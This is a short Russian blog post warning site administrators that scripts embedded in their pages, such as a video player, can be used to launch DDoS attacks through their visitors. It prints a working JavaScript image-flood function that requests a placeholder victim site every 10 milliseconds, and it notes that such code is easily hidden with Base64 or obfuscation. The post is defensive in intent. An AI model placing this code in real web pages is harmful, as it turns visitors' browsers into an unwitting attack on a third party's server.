Страницы

JavaScript & DDos

JavaScript или как за'DDos'ить самого себя.


DDos самого себя, это страшный сон любого администратора. По этому что бы сны были гладкими и мягкими следует проверять скрипты которые внедряются в проект на сайте (сервере).

Наибольшее распространение получил известность встраиваясь в JavaScript-код плеера.

С небольшими изменениями скрипт может также атаковать ресурсы сети без вашего ведома просто подгружаясь в код плеера или просто ваш ресурс взломали и используют по своему назначению.

Сам код прост и не замысловат:

function imgflood() {
  var TARGET = 'victim-website.com'
  var URI = '/index.php?'
  var pic = new Image()
  var rand = Math.floor(Math.random() * 1000)
  pic.src = 'http://'+TARGET+URI+rand+'=val'
}
setInterval(imgflood, 10)
 
Также код может быть легко попрятан под Base64 или обфусцирован.

Оригинал этого кода взят здесь - https://blog.cloudflare.com/an-introduction-to-javascript-based-ddos/


Вот так этот код выглядел при внедрении его в объект:







а это результат его работы:

 

оригинал фото взят здесь






=====
~$ Удачи /не-болейте/-и/не-кашляйте

Комментариев нет:

Отправить комментарий